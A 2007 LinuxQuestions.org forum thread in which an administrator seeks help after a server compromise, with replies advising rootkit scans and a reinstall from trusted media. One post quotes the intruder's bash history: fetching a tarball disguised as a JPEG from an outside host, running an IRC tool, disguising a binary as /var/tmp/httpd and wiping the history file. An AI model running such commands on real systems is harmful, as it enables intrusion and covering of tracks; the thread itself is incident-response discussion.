Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here. |
Notices |
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
|
|
03-20-2007, 04:33 AM
|
#1
|
LQ Newbie
Registered: Nov 2006
Posts: 4
Rep:
|
Root user bash shell look like "bash-2.05b#" and /root empty
Hi there
Please help me..anyone
My server was attack by a scriptkiddie and the little bastard loaded a script which ran from the /tmp dir, I managed to delete everything and the server seems to be fine but...after my last restart I connected using ssh/root and my prompt appear like "bash-2.05b#" I then did a directory listing in the root dir and found it to be empty????
Whats going on?
Has this box been seriuosly compromised and I am to stupid to realise?
Any help or suggestions, thanks
PS If this post is in the wrong place, oops sorry
|
|
|
03-20-2007, 06:20 AM
|
#2
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
Quote:
Originally Posted by y2pk001
after my last restart I connected using ssh/root and my prompt appear like "bash-2.05b#" I then did a directory listing in the root dir and found it to be empty????
|
But if you login locally (physically login to the system) is the root filesystem there?
In the meantime, I would highly recommend downloading rkhunter or chkrootkit and scanning the system. Also, do you have any idea of how the system was compromised, any of the files that were on the system, or what commands were executed (e.g. bash history)?
|
|
|
03-20-2007, 09:57 AM
|
#3
|
LQ Newbie
Registered: Nov 2006
Posts: 4
Original Poster
Rep:
|
Thanks for you reponse
I am unable to log onto the machine locally, it lives on the otherside of the world from me, I will ask the ISP guys to have a look.
I have run all the tools you spoke of and everything checks out fine
Here is the bash_history
keru.100free.com/all.jpg
tar xzvf all.jpg
rm -rf all.jpg
cd all
cd acy
./acycmech-linux 3 "#sex123456" - *\!*@supr3mul.users.undernet.org
cd ..
cp linux /var/tmp/httpd
/var/tmp/httpd
cat /proc/cpuinfo
cd ~
ls -a
echo > .bash_history
All I did was delete the user and I found a funny process running in the /tmp dir, I deleted everthing in the /tmp a and killed the process.
What that process was doing was sending email(Spam) that looked like it was comming from ebay.com, that stopped.
What else should I do??
Thanks a million
|
|
|
03-20-2007, 08:04 PM
|
#4
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
Quote:
All I did was delete the user
|
So a new user was created on the system?
Quote:
and I found a funny process running in the /tmp dir
|
From the bash_history, it looks like there might be stuff in /var/tmp as well. Note that the bash_history is likely incomplete (you can see him try and wipe it with the last command). What user was this bash_history from?
Frankly, this looks very suspect, and I would rebuild this box from trusted media. The fact that you do not have physical access to this box is going to make doing any kind of forensic analysis difficult. Normally I would tell you to power the box down and boot using a CD-ROM based distro like Knoppix, mount the compromised system and see if the filesystem is intact. However that isn't really an option here it seems. The odd bash prompt and missing filesystem is concerning, especially since the system is still running and is able to authenticate you to a non-existent /etc/passwd.
|
|
|
03-22-2007, 03:13 AM
|
#5
|
LQ Newbie
Registered: Nov 2006
Posts: 4
Original Poster
Rep:
|
The user existed but was created /bin/bash and a VERY weak password (not by me, by my incompitent colleague), it was for a client who wanted a POP3/imap email.
I have a feeling that in my panic I might have typed:
rm -Rf /root
What would have happen if I was stupid enough to do that?
A re-install will be abit diffcult, with the current political enviroment within my office it will almost certainly mean a move to Mircosoft Windows which will alomost certainly result in my resignation. So i sort need to try and fix this mess on the hush hush.
Again thanks alot for your help
|
|
|
03-22-2007, 04:20 AM
|
#6
|
Member
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88
Rep:
|
If you can be 101+% sure the root isn't compromised and there are no backdoors etc. kiddie stuff on the server I think you can restore your server's normal run, after deleting/upgrading the vulnerable software you have on the server. But I wouldn't trust that machine in that situation. I would reinstall.
Last edited by Fadoksi; 03-22-2007 at 04:22 AM.
|
|
|
03-22-2007, 08:33 PM
|
#7
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
Quote:
Originally Posted by y2pk001
I have a feeling that in my panic I might have typed:
rm -Rf /root
What would have happen if I was stupid enough to do that?
|
It would just delete root's home filesystem, in which case you would likely have effects like you're experiencing, like the odd bash prompt because the .bashrc and user-specific config files are all missing. It's really important to be certain that *you* did that and not the intruder. If the intruder was able to delete files owned by root, then they had administrative access and you are hosed and they could have basically done anything including install malicious kernel modules or even replace the kernel itself with version that happily report everything is Ok and do other nasty things like neglect to show any files owned by the intruder when using system command like ls. So it is very important to be sure of this.
Quote:
Originally Posted by y2pk001
A re-install will be abit diffcult, with the current political enviroment within my office it will almost certainly mean a move to Mircosoft Windows which will alomost certainly result in my resignation. So i sort need to try and fix this mess on the hush hush.
|
Frankly I think you should reinstall and deal with the consequences, but I'm not you and I can't pretend to know what kind of position you are in, so I'll leave it at that.
If you just hosed /root with rm -rf /root, then you can likely just rebuild that part of the filesystem. There should be copies of the standard user-specific config files in /etc/skel/. You can copy these over to /root and make sure the permissions and ownership are ok.
|
|
|
All times are GMT -5. The time now is 11:37 AM.
|
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
|
Latest Threads
LQ News
|
|